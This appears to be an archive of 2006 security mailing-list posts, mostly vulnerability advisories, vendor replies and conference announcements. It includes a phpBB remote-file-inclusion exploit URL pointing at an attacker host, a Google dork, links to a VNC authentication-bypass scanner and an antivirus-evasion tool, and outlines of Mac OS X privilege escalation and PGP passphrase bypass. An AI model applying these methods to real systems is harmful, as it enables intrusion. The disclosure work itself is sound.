[#] Security Advisory [^] http://securitynews.ir/ [>] Advisory Title: TikiWiki Sql injection & XSS Vulnerabilities [EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir [$] Product Vendor : http://tikiwiki.org/ [.] Affected Versions : 1.9.3.2 (and maybe before) [/] Release Date : 06/13/2006 [*] Overview : Tikiwiki is a very powerful multilingual Wiki/CMS/Groupware, but it has some security bugs too . One sql injection and several cross-site scripting bugs have been found in tikiwiki 1.9.3.2 (and tested in 1.9.3.1) . [*] Details : No exploitable detail is going to be released . [*] Solution : Vendor contacted on 06/09/2006 and they have been released a new version (tikiwiki 1.9.4) : http://sourceforge.net/project/showfiles.php?group_id=64258 -- http://securitynews.ir/
Re: phpBB2 (template.php) Remote File Inclusion
template.php is an addon and not part of phpbb2, noobs [EMAIL PROTECTED] wrote: *Title: *phpBB2 Remote File Include * * *Credit: *Canberx * * *Thanx: *Forewer-Partizan * * *Mail: [EMAIL PROTECTED]www.canberx.tk * * *Google Dork: *Powered by phpBB © 2001, 2002 phpBB Group * * *Exploit: *www.target.com/[path_to_phpbb]/template.php?page=[attacker] * * * Plz Don't Hacked site if it already has been defaced :) * __ NOD32 1.1578 (20060604) Information __ This message was checked by NOD32 antivirus system. http://www.eset.com begin:vcard fn:Arnaud Dovi / Ind. Security Researcher n:Dovi;Arnaud email;internet:[EMAIL PROTECTED] tel;work:Independent Security Researcher version:2.1 end:vcard
Blackhat USA 2006 - Review , remarks and proposal agenda
Ode: Hiding Shellcode In Plain Sight - Michael Sutton & Greg McManus Day 2 : 09:00 - 09:50 -> RFID Malware Demystified - Melanie Rieback 10:00 - 11:00 -> Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"- Jeremiah Grossman & TC Niedzialkowski 11:15 - 12:30 -> AJAX (in)security - Billy Hoffman 13:45 - 15:00 -> WiFi in Windows Vista: A Peek Inside the Kimono - Noel Anderson 15:15 - 16:30 -> Vulnerabilities in Not-So Embedded Systems - Brendan O'Connor 16:45 - 18:00 -> Faster Pwning Assured: Hardware Hacks and Cracks with FPGAs- David Hulton It's just a proposition and the most problem with this USA briefings is that if your company want to take maximum benefices from this conference, it will need to send 2 or 3 employees to follow all interesting sessions ... that the only drawback of Blackhat : Too much interesting subjects for one attendee :-) Regards - Comments are well come on http:www.security-briefings.com - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 are you sure dos only ? got a quick look on it , and if you are able to control this null pointer , the bug is exploitable, might be good more research on this bug. [EMAIL PROTECTED] wrote: > Hash: RIPEMD160 > > > --- > > | BuHa Security-Advisory #12|May 25th, 2006 | > > --- > > | Vendor | MS Internet Explorer 6.0 | > > | URL | http://www.microsoft.com/windows/ie/ | > > | Version | <= 6.0.2900.2180.xpsp_sp2 | > > | Risk | Low (Denial of Service)| > > --- > > > o Description: > > = > > > Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser > > made by Microsoft and currently available as part of Microsoft Windows. > > > Visit http://www.microsoft.com/windows/ie/default.mspx or > > http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. > > > o Denial of Service: #7d6d2db4 > > === > > > Following HTML code forces MS IE 6 to crash: > > >> > > > Online-demo: > > http://morph3us.org/security/pen-testing/msie/ie60-1132901785453-7d6d2db4.html > > > These are the register values and the ASM dump at the time of the access > > violation: > > >> eax= ebx= ecx=00e78d38 edx=00e7a704 esi=0012a268 > > >> edi= eip=7d6d2db4 esp=0012a228 ebp=0012a25c > > > >> 7d6d2d7d e868f9 callmshtml+0x2226ea (7d6d26ea) > > >> 7d6d2d82 50 pusheax > > >> 7d6d2d83 e835f8 callmshtml+0x2225bd (7d6d25bd) > > >> 7d6d2d88 85c0 testeax,eax > > >> 7d6d2d8a 8945f8 mov [ebp-0x8],eax > > >> 7d6d2d8d 0f85c402 jne mshtml+0x223057 (7d6d3057) > > >> 7d6d2d93 8b461c mov eax,[esi+0x1c] > > >> 7d6d2d96 8b4e18 mov ecx,[esi+0x18] > > >> 7d6d2d99 8365f400 and dword ptr [ebp-0xc],0x0 > > >> 7d6d2d9d 8365fc00 and dword ptr [ebp-0x4],0x0 > > >> 7d6d2da1 8b7e14 mov edi,[esi+0x14] > > >> 7d6d2da4 8945f0 mov [ebp-0x10],eax > > >> 7d6d2da7 e88462e4ff callmshtml+0x69030 (7d519030) > > >> 7d6d2dac 3bc7 cmp eax,edi > > >> 7d6d2dae 0f840202 je mshtml+0x222fb6 (7d6d2fb6) > > >> FAULT ->7d6d2db4 8b07 mov eax,[edi] > > >> ds:0023:= > > >> 7d6d2db6 8bc8 mov ecx,eax > > >> 7d6d2db8 83e10f and ecx,0xf > > >> 7d6d2dbb 49 dec ecx > > >> 7d6d2dbc 0f849c01 je mshtml+0x222f5e (7d6d2f5e) > > >> 7d6d2dc2 49 dec ecx > > >> 7d6d2dc3 0f84b300 je mshtml+0x222e7c (7d6d2e7c) > > >> 7d6d2dc9 49 dec ecx > > >> 7d6d2dca 49 dec ecx > > >> 7d6d2dcb 746c jz mshtml+0x222e39 (7d6d2e39) > > >> 7d6d2dcd 83e904 sub ecx,0x4 > > >> 7d6d2dd0 0f85a501 jne mshtml+0x222f7b (7d6d2f7b) > > >> 7d6d2dd6 8bcf mov ecx,edi > > >> 7d6d2dd8 e8482ffeff callmshtml+0x205d25 (7d6b5d25) > > >> 7d6d2ddd 85c0 testeax,eax > > >> 7d6d2ddf 7430 jz mshtml+0x222e11 (7d6d2e11) > > >> 7d6d2de1 837e0400 cmp dword ptr [esi+0x4],0x0 > > > This issue is a non-exploitable Null Pointer Dereference vulnerability and > > leads to DoS. > > > o Vulnerable versions: > > = > > > The DoS vulnerability was successfully tested on: > > >> MS IE 6 SP2 - Win XP Pro SP2 > > >> MS IE 6 - Win 2k SP4 > > > o Disclosure Timeline: > > = > > > xx Feb 06 - Vulnerabilities discovered. > > 08 Mar 06 - Vendor contacted. > > 22 Mar 06 - Vendor confirmed vulnerabilities. > > 25 May 06 - Public release. > > > o Solution: > > == > > > I think - this is not an official statement from the Micros
RE: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.
Hello, This is an official response from the TrueCrypt development team. First, this is not a security bug. It is a known, documented and expected feature. It is utilized, for example, for the volume header backup/restore operation. Quotes from the TrueCrypt documentation: "WARNING: Restoring a volume header also restores the volume password that was valid when the volume header backup was created." Quote 2: "Note that if an adversary knows your password and has access to your volume, he may be able to retrieve and keep its master key. If he does, he may be able to decrypt your volume even after you change its password (because the master key was not changed). In such a case, create a new TrueCrypt volume and move all files from the old volume to this new one." Sincerely, Ennead TrueCrypt Foundation > > Hello, > > Are you aware of this issue? > > Regards, > > Christopher. > > -Original Message- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Thursday, May 25, 2006 3:56 AM > To: bugtraq@securityfocus.com > Subject: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP > 8.x & 9.x and Truecrypt. > > A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x > and Truecrypt. > > > Affected Products: > > > * PGP 8.x PGP 9.x maybe older version too > > > * Truecrypt 4.2 maybe older version too > > > // Full detail can be found here // > > <> http://www.safehack.com/Advisory/pgp/PGPcrack.html > > <> http://www.safehack.com/Advisory/truecrypt/truecrypt.html > > > If you would like to watch the flash video check the following links. > > <> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02 > >http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html > > > <> truecrypt.html Tested on the latest version truecrypt-4.2.zip > >http://www.safehack.com/Advisory/truecrypt/truecrypt.html > >Note If you put stuff inside your test file you need to use a > >debugger to extract the data. If you just follow the video you > >will see how it is done without a debugger and an empty file. > > > The How? > > > > I Was able to ACCESS PGP encrypted disks if the disk was encrypted with a > passphrase or a public Key. This method will work on both scary huh :- ) > > > You need the followings tools: > > -- > >1. A Brain > >2. A Hex Editor. > >3. PGP 8.1 Entreprise or Personal. You can use 9.x too. My feeling is > this method will work on older versions too, because it is a design flaw in > PGP application not in PGP algorithm. > >4. A Debugger. Not needed if you wana backdoor pgp (olldbg) > > > > During my tests I have found that PGP virtual DISK and PGP Self Extractable > file SDA have a SERIOUS security bug. I would rather say a design bug. > > > PGP disk or SDA can be cracked in 3 major steps: > > > >1. Editing PGP protected file using a hex editor. (Patching the > passphrase). > >2. Tracing PGP protected file using a debugger. (You need a lot of time > and coding/cracking experience) > >3. Patching the responsible bytes. > > > I have spend only couples of days debugging but surely a lot more time is > needed. But once the process is understood it is question of finding the > right bytes and patching them. > > > > > Conclusions for 6 days debugging and testing: > > = > > * PGP Virtual Disk and PGP and PGP SDA has a serious bug. I have tested > PGP 8.1 Entreprise. Other version many be vulnerable too. > > > * PGP corporation made the same error in PGP 9.x you can bypass the > passphrase Dialog box same way. > > > * PGP corporation could avoid this type of issue by calculation the HASH > for the encrypted file. They should make it harder to locate the passphrase. > > > * PGP Virtual Disk First Level protection bypass. Passphrase bypass. > (Working 100%) > > > * PGP Virtual Disk Backdooring (Working 100%). > > > * PGP Virtual Disk Mounting / Adding Users / Deleting Users / > Re-Encrypting Disk (Working 100%). > > > * PGP Virtual Disk Mounting and Data Access (Working 40%. Need more time > to debug). > > > * PGP SDA Passphrase bypass. (Working 100%) > > > * PGP SDA Extraction is possible IF the input file is the same (Working > 100% Patching using a Debugger) > > > * PGP SDA
Addendum
Addendum to my previous letter: Note that this design (master key encrypted with header key) is common and has been used for many years by many products (for example, Scramdisk, E4M, etc.) The main advantage of the design is that the user can change his password within a few seconds without having to re-encrypt the entire volume (which could take even days or weeks). In case of TrueCrypt, this also allows administrators in large corporations to "reset" passwords when a user forgets his password. This is described in the manual and in the FAQ: Quote from the TrueCrypt FAQ: "Q: We use TrueCrypt in a corporate environment. Is there a way for an administrator to reset a volume password when a user forgets it (or when he or she loses the keyfile)? A: There is no back door implemented in TrueCrypt. However, there is a way to reset a TrueCrypt volume password/keyfile. After you create a volume, backup its header (select Tools -> Backup Volume Header) before you allow a non-admin user to use the volume. Note that the volume header (which is encrypted with a header key derived from a password/keyfile) contains the master key with which the volume is encrypted. Then ask the user to choose a password, and set it for him/her (Volumes -> Change Volume Password); or generate a user keyfile for him/her. Then you can allow the user to use the volume and to change the password/keyfiles without your assistance/permission. In case he/she forgets his/her password or loses his/her keyfile, you can reset the volume password/keyfiles to your original admin password/keyfiles by restoring the volume header (Tools -> Restore Volume Header)." In conclusion, this is not a "security bug", but design/feature. Also, to exploit the design, the adversary would have to know your password first (or have your keyfiles). That means, for example, that he would capture it using a keystroke logger. If that was the case, then all security would be practically lost on that machine. Sincerely, Ennead TrueCrypt Foundation > > Hello, > > Are you aware of this issue? > > Regards, > > Christopher. > > -Original Message- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Thursday, May 25, 2006 3:56 AM > To: bugtraq@securityfocus.com > Subject: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP > 8.x & 9.x and Truecrypt. > > A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x > and Truecrypt. > > > Affected Products: > > > * PGP 8.x PGP 9.x maybe older version too > > > * Truecrypt 4.2 maybe older version too > > > // Full detail can be found here // > > <> http://www.safehack.com/Advisory/pgp/PGPcrack.html > > <> http://www.safehack.com/Advisory/truecrypt/truecrypt.html > > > If you would like to watch the flash video check the following links. > > <> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02 > >http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html > > > <> truecrypt.html Tested on the latest version truecrypt-4.2.zip > >http://www.safehack.com/Advisory/truecrypt/truecrypt.html > >Note If you put stuff inside your test file you need to use a > >debugger to extract the data. If you just follow the video you > >will see how it is done without a debugger and an empty file. > > > The How? > > > > I Was able to ACCESS PGP encrypted disks if the disk was encrypted with a > passphrase or a public Key. This method will work on both scary huh :- ) > > > You need the followings tools: > > -- > >1. A Brain > >2. A Hex Editor. > >3. PGP 8.1 Entreprise or Personal. You can use 9.x too. My feeling is > this method will work on older versions too, because it is a design flaw in > PGP application not in PGP algorithm. > >4. A Debugger. Not needed if you wana backdoor pgp (olldbg) > > > > During my tests I have found that PGP virtual DISK and PGP Self Extractable > file SDA have a SERIOUS security bug. I would rather say a design bug. > > > PGP disk or SDA can be cracked in 3 major steps: > > > >1. Editing PGP protected file using a hex editor. (Patching the > passphrase). > >2. Tracing PGP protected file using a debugger. (You need a lot of time > and coding/cracking experience) > >3. Patching the responsible bytes. > > > I have spend only couples of days debugging but surely a lot more time is > needed. But once the process is understood it is question of finding the > right
Novell Client login form enables reading and writing from and to the clipboard of the logged-in user
clear
It has a task bar icon and clicking it clears the clipboard. I guess it will
not be suitable to run as a scheduled task since activating it only makes it
available at the task bar. It has no startup switches.
I tried to find a scheduler that can run an application at the event when
the workstation is being locked, but found only this two:
1. Funny, but someone asked just that at Novell's site and he was answered
that this can be done with NALRUN32 and NALRUNW from Novell's "Workstation
Manager" ("ZEN 2 Application Management Tool Kit"), but without a proper
example.
http://www.novell.com/coolsolutions/qna/4332.html
http://www.novell.com/coolsolutions/zenworks/features/a_zen2_toolkit_zw.html
#nalrun
2. The task scheduler of windows vista will be able to do this (when windows
vista will be officially released...).
http://www.microsoft.com/technet/windowsvista/mgmntops/taskschd.mspx
Vendor Notification: Novell was notified of this issue more than two months
ago.
Due to my feeling that the company was not acting to solve this issue, I
notified them after one month, that I will wait another month, and if at
that time the company will not publish an advisory and/or a patch – I will
publish my own advisory.
Since the company did not publicly acted regarding this vulnerability within
this time frame, which I think is reasonable – this advisory is now
published.
Novell's lack of action may be due to the low risk nature of this
vulnerability.
Credit:
Eitan Caspi
Israel
Email: [EMAIL PROTECTED]
Past security advisories:
1.
http://online.securityfocus.com/bid/4053
http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx
http://support.microsoft.com/default.aspx?scid=KB;en-us;315085&;
2.
http://online.securityfocus.com/bid/5972
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q329350
3.
http://online.securityfocus.com/bid/6280
http://www.securityfocus.com/archive/1/301624
4.
http://online.securityfocus.com/bid/6736
http://online.securityfocus.com/archive/1/309442
5.
http://www.securityfocus.com/bid/7046
http://www.securityfocus.com/archive/1/314361
6.
http://www.securityfocus.com/archive/1/393800
http://service1.symantec.com/SUPPORT/ent-security.nsf/3d2a1f71c5a00334852568
0f006426be/c937e09a6ad4e20688256a22002724bb?OpenDocument
Articles:
You can find some articles I have written at
http://www.themarker.com/eng/archive/one.jhtml
(filter: Author = Eitan Caspi (second name set), From year = 2000 , Until
year = 2002)
Eitan Caspi
Israel
Professional Blog (Hebrew): http://www.notes.co.il/eitan
Personal Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi
Blog (English): http://eitancaspi.blogspot.com
"Technology is like sex. No Hands On - No Fun." (Eitan Caspi)
VNC_bypauth: vnc scanner multithreaded linux & windows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 windows: http://heapoverflow.com/vnc_reloaded/VNC_bypauth-win32.rar linux: http://heapoverflow.com/vnc_reloaded/VNC_bypauth-linux.tar.gz comments: http://heapoverflow.com/viewtopic.php?p=1729 Hello J.Weatherall :) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (MingW32) iD8DBQFEaztYFJS99fNfR+YRAolZAJ9TIe9C4cg0Jbg5LyiOaQKMQNND8ACgzqUc M41+Y+JmWkjCOEuOEiO/9bA= =xrq7 -END PGP SIGNATURE-
iDefense Q2 2006 Vulnerability Challenge
iDefense Labs is pleased to announce the launch of next installment in our quarterly vulnerability challenge. Last quarter's challenge focused on critical vulnerabilities in Microsoft products and was a great success. We would like to thank everyone that forwarded submissions prior to the deadline on March 31, 2006. We look forward to announcing award winners once public advisories become available for the vulnerabilities. For the second quarter of 2006, we're shifting the focus from vendor to technology. This time around, we're focusing on database vulnerabilities. For submissions received before June 30, 2006, iDefense Labs will pay $10,000 for each vulnerability submission that results in the discovery of a remotely exploitable database vulnerability that meets the following criteria. - Technologies: - Oracle Database 10G - Microsoft SQL Server 2005 - IBM DB Universal Database 8.2 - MySQL 5.0 - PostgreSQL 8.1 - The vulnerability must be original and not previously disclosed either publicly or to the vendor by another party - The vulnerability must be remotely exploitable in a default installation of one of the targeted technologies - The vulnerability must exist in the latest version of the affected technology with all current patches/upgrades applied - The vulnerability cannot be caused by or require third party software - The vulnerability must result in root access on the target machine - The vulnerability must not require the use of authentication credentials - The vulnerability must receive the vendor's maximum severity ranking when the advisory is published (if applicable). In order to qualify, the submission must be sent during the current quarter and be received by midnight EST on June 30, 2006. The $10,000 prizes will be paid out following confirmation with the affected vendor and will be paid in addition to any amount paid for the vulnerability when it is first accepted. Only the initial submission for a given vulnerability will qualify for the reward and a maximum of six awards will be paid out. Should more than six submissions qualify, the first six submissions will receive the reward. Further details on the iDefense Vulnerability Contributor Program (VCP) can be found at: http://labs.idefense.com/vcp.php Michael Sutton Director, iDefense Labs
New site about security conferences : www.security-briefings.com
Hello all, We proud to announce the release of a new site devoted to security conferences : http://www.security-briefings.com Our goal is to highlight major information provided during the most popular and interesting conferences such as (but not limited to) : Blackhat, Shmoocon, Defcon, Recon, Cansecwest,... We will update regularly the site's content with what we think being important for security people. Hope we can participate to the community effort to spread knowledge about security. Regards newslist [at] security-briefings.com
Re: [Full-disclosure] Re: [VulnWatch] [xfocus-SD-060314]Microsoft Office Excel Buffer Overflow Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 no, but our discoveries are all patched with the same patch, look at the MS advisory closely: http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx Microsoft thanks <http://go.microsoft.com/fwlink/?LinkId=21127> the following for working with us to help protect customers: ? Ollie Whitehouse of Symantec <http://symantec.com/> for reporting the Microsoft Office Remote Code Execution Using a Malformed Routing Slip Vulnerability - CVE-2006-0009 ? FelicioX <mailto:[EMAIL PROTECTED]> for working with Microsoft on the Microsoft Office Excel Remote Code Execution Using a Malformed Range Vulnerability ? CVE-2005-4131 ? Peter Winter-Smith of NGS Software <http://www.ngssoftware.com/index.htm> for reporting similar behavior to the Remote Code Execution with Microsoft Office Excel Vulnerability - - CVE-2005-4131 ? TippingPoint <http://www.tippingpoint.com/> and the Zero Day Initiative <http://www.zerodayinitiative.com/> for reporting the Microsoft Office Excel Remote Code Execution Using a Malformed File Format Parsing Vulnerability - CVE-2006-0028 ? Dejun of the Fortinet Security Response Team <http://www.fortinet.com> for reporting the Microsoft Office Excel Remote Code Execution Using a Malformed Description Vulnerability - CVE-2006-0029 ? Eyas of the XFOCUS Security Team <http://www.xfocus.org/> for reporting the Microsoft Office Excel Remote Code Execution Using a Malformed Record Vulnerability ? CVE-2006-0031 only FelicioX and NGSS found the same bug ;) Thierry Zoller wrote: > Dear XFOCUS Team, > > Is this the same vuln as discovered by class101 ? > http://www.zerodayinitiative.com/advisories/ZDI-06-004.html > > > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (MingW32) iD8DBQFEGSZUFJS99fNfR+YRAh9xAJwM9sP9dSlqsn9IsO3czfdj+1sknQCdH/MD Y01obA6+miFI7VGgcYHeOQ0= =KczF -END PGP SIGNATURE-
SyScan'06 Call For Papers
SyScan'06 CALL FOR PAPER **ABOUT SYSCAN’06** The Symposium on Security for Asia Network aims to be a very different security conference from the rest of the security conferences that the information security community in Asia has come to be so familiar and frustrated with. SyScan’06 intends to be a non-product, non-vendor biased security conference. It is the aspiration of SyScan’06 to congregate, in Singapore, the best security experts in their various fields, to share their research, discovery and experience with all security enthusiasts in Asia. The speakers that will be at SyScan’06 are among the best, and brightest. These experienced security professionals at the vanguard of leading information security technology have assembled unique new material that they will present at this conference to help you maintain your technological leadership and stay abreast of the latest developments in this rapidly moving technological field. This two-day symposium will be held in a relaxed and informal atmosphere, allowing all participants to enjoy themselves whilst expanding their knowledge on information security. Besides main the conference, there will also be specialized security training courses in SyScan’06. These classes will be held before the main conference. Dates: Training - 18th and 19th July 2006 Conference - 20th and 21st July 2006 Venue: Swissotel Merchant Court Hotel, Singapore. **SPEAKERS/TRAINERS PRIVILEGES** Speakers at SyScan’06 will enjoy the following privileges. Generic Privileges • Return economy class air-ticket for one person. • Hotel accommodation. • Breakfast, lunch and dinner during conference. • After-conference party. • A healthy dose of alcohol. Special Privileges • *One selected speaker from each category will receive US$1,000 honorarium in cash. Selection will be based on the following criteria: o New presentation not seen in any other conferences before. • **Presentations that reveal unpublished/undisclosed vulnerabilities/exploits/techniques/malware will receive US$2,000 honorarium in cash. Selection will be based on the following criterion: o Critical zero-day vulnerability, or o Working exploits (can be reproduce and must have POC), or o New techniques for: Discovery of vulnerability, or Exploiting existing vulnerability o New form of malware. **CFP COMMITTEE** The SyScan'06 CFP Committee is made up of the following people: 1) Dave Aitel - Immunitysec 2) Matthew "Shok" Conover - Symantec 3) SK Chong - Scan Associates 4) Thomas Lim - SyScan **CFP SUBMISSION** CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously. 2) Proposed presentation title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational experience/background. 6) Why is your material different or innovative or significant or an important tutorial? All submission must be in English in either MS Office or OpenOffice or PDF format. The more information you provide, the better the chance for selection. Please send submission to [EMAIL PROTECTED] Submission must be done no later than 30th April 2006. **IMPORTANT DATES** Final CFP Submission – 30th April 2006 Notification of Acceptance – 15th May 2006 Final Accepted Presentation Material Submission – 30th June 2006 **TOPICS** The following categories are the focus for SyScan’06: 64-bit Vista Mobile Devices Malware VoIP Linux The scopes of the focus are broad and include, but not restricted to the following areas: 64-bit Vista • Vulnerabilities o Kernel o Protocols • Exploits o Kernel o Protocols o Shellcodes • Malware o Virus o Rootkit o Spyware Mobile Devices (embedded systems) • Vulnerabilities o Operating Systems o Applications • Exploits o Operating Systems o Applications • Malware o Virus Malware • Rootkits • Spyware VoIP • Vulnerabilities • Exploits Linux • Vulnerabilities o Kernel o Protocols • Exploits o Kernel o Protocols BotNets Others Any topics that will catch the attention of the CFP committee and/or the world. **OTHER INFORMATION** Please feel free to visit SyScan’06 website to get a feel what this conference is all about – SHARE AND HAVE FUN! Also lookout here for the latest update on SyScAN’06. *It is possible and not necessary that every category will have a speaker that will receive the US$1000 honorarium. The CFP committee of SyScan’06 will be the final arbitrator on this matter. **If your presentation meets the criterion for both categories of honorarium, you will receive only the higher honorarium of US$2,000 in cash. The CFP committee of SyScan’06 will be the final arbitrator on this matter. By agreeing to speak at the SyScan’06 you are granting SyS
DSplit - Tiny AV signatures Detector
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 DSplit is the small brother of an old tool known as UKsplitter wich is now abandonned, does not work in vmware, fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms and I'm not responsible of the bad uses of it, I recall this method is known since a long time and it's up to the AV firms to review their detections software. http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm http://getdsplit.class101.org usual critics , flames, can be directly sent to the Recycle Bin :> -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAiMwa+LRXunxpxfAQKMvxAAyymzCo/aupOnqB6XFC7hK45IrbW8J+LQ a3oO/p/AFNMZdFUw8fo22n4N+gEeZd1iqHzYyvpuyfp4w9bvy5MXVE5SC8ZTneuN n3Ci6PCQGfF/b6pk+XeyJ1aZsUOjA36TIxSG+g12rERpGLmYNba3NLVUw5P0h9uS 6HupomFeRa1Bzf8yKTDOWhbNcaogR93hzeHgaqJoUe4sxJFiSfFZ0uC+yATBLcnB oNgTBIUXqpGJGpoO7+F6odgX0pn2w4xX2/xnyWEvKc2Lv9YO8sMhRGh8o6SC/q8p KJ+w2PaRPGcAt0PFD3XkSf1N9ntrXpx2bYrQP0DqOiRYNCPmnvBLyKkPeEvERzNc e+dCPw3iMC2/t1IB0DAS78ZNC7ORJv+6jc/TZ19IXYHuyfbMMrSWYaw2mJwJp71x 7HwGN8b58fBAVrEh7OU8WOhRb4LBNeDISIV44pY32b16rG3MamaYjEFwDs18h+TI 2Pjsu5Sygs1WeD1u4gx4QrCO5Pb9H8GRzYYhxauv0YijhapACNQjQE2/IJov3fOa uf91+aJWEBViWK/hXPBbyBznYySmDm/qs6aiz9nvUws9IK82AvdXGAAKtK1dN52L xjRZI1kS0YrITdyXswXnE/CFL4pHlU//PlTUNnY1WfA4jZ9Wz1OxHsNnsV3BNdNF 0Uu/0R6ycOo= =Ce/n -END PGP SIGNATURE-
iDefense Security Advisory 03.02.06: EMC Dantz Retrospect 7 Backup client DoS Vulnerability
EMC Dantz Retrospect 7 Backup client DoS Vulnerability iDefense Security Advisory 03.02.06 http://www.idefense.com/application/poi/display?type=vulnerabilities March 02, 2006 I. BACKGROUND EMC Dantz Retrospect is a network backup client designed for small to mid-sized businesses. Dantz protects millions of computers world wide by providing enterprise class backup protection for servers, notebooks, and business critical applications. More information on this software package can be found on the vendors site: http://www.dantz.com II. DESCRIPTION The Dantz Retrospect 7 backup client listens on TCP port 497 for commands from the central backup server. Sending a specially crafted malformed packet to this socket can force the backup client to terminate. This allows for an unauthenticated attacker to effectively disable the network backup services for a target network. III. ANALYSIS Exploitation appears to be limited to a DoS only condition. From debug log information it appears that the packet corruption is detected by the application which then decides to terminate rather than discard the data. The following type information may be found in debug logs of exploited machines Assertion failure at \retroclient\Win\winutil.c-1201 DebugFail: Client Terminated Retrospect Client Terminated. IV. DETECTION This exploit has been tested with the Dantz Retrospect Client version 7.0.107. This is the latest available on the vendor's website. The version available for Mac is 6.0 has also been tested and is not vulnerable to the issue described in this document. V. WORKAROUND iDefense is unaware of any workaround for this issue. VI. VENDOR RESPONSE "This problem has been resolved in the latest updates to the Retrospect Client for Windows versions 7.0.109 and 6.5.138 software. All customers who use the Retrospect Client Software versions 6.5 or 7 are encouraged to download and install the latest Retrospect Client software, at no additional cost, from the EMC Web site at: http://www.emcinsignia.com/supportupdates/updates/retrospect/archive/ Retrospect Express and Retrospect 7.5 customers do not need this update." The EMC KB article for this issue is found at: http://kb.dantz.com/article.asp?article=8361&p=2 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 12/15/2005 Initial vendor response 03/02/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 03.02.06: Apple Mac OS X passwd Arbitrary Binary File Creation/Modification
Apple Mac OS X passwd Arbitrary Binary File Creation/Modification iDefense Security Advisory 03.02.06 http://www.idefense.com/application/poi/display?type=vulnerabilities March 02, 2006 I. BACKGROUND Mac OS X is an operating system for the Apple family of microcomputers. More information is available at the following link: http://www.apple.com/macosx/ II. DESCRIPTION Local exploitation of a design error in version 10.3.9 of Apple Computer Inc.'s Mac OS X could allow arbitrary files to be overwritten with user supplied contents. The /usr/bin/passwd binary is a setuid application which allows users to change their password. There are two related vulnerabilities. The first vulnerability occurs because the Mac OS X version of the passwd utility accepts options specifying which password database to operate on. The passwd binary does not check that the user has permissions to create a file in the location specified and does not set the created file permissions. By setting the file creation mask to 0 a user can create arbitrary files owned by root, with permissions which allow any user to change the contents. The second vulnerability exists in the insecure creation of temporary files with predictable names. The temporary filename created by the process is in the form /tmp/.pwtmp. where is the process id of the passwd process. By creating a symbolic link to the target file, and then changing the password, it is possible to put controllable contents into the target file. III. ANALYSIS Successful exploitation of either of these vulnerabilities would allow a local attacker to gain elevated privileges in a number of ways. In the case of the first vulnerability, a new file could be created in the /etc directory, such as etc/rc.local_tuning, which is sourced if it exists during the system start up process as the root user. The second vulnerability would allow an attacker overwrite a file with user controlled contents. This can be leveraged to provide privilege escalation by, for example, creating a new /etc/sudoers file. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Mac OS X Version 10.3.9. In addition, the following versions been confirmed by the vendor to be vulnerable: * Mac OS X Server Version 10.3.9 * Mac OS X Version 10.4.5 * Mac OS X Server Version 10.4.5 It is suspected that all prior releases are vulnerable. V. WORKAROUND Remove the setuid bit from the /usr/bin/passwd binary by executing the following command as root: chmod -s /usr/bin/passwd This workaround will prevent non-root users from being able to change their password. VI. VENDOR RESPONSE Apple have released an update for this vulnerability, details of which are available at the following location: http://docs.info.apple.com/article.html?artnum=61798 Apple security updates are available via the Software Update mechanism: http://docs.info.apple.com/article.html?artnum=106704 Apple security updates are also available for manual download: http://www.apple.com/support/downloads VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues: CVE-2005-2713 - passwd file creation and permissions CVE-2005-2714 - temporary file symlink problem VIII. DISCLOSURE TIMELINE 08/23/2005 Initial vendor notification 08/27/2005 Initial vendor response 03/02/2006 Coordinated public disclosure IX. CREDIT Discovery of these vulnerabilities are credited to vade79. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and 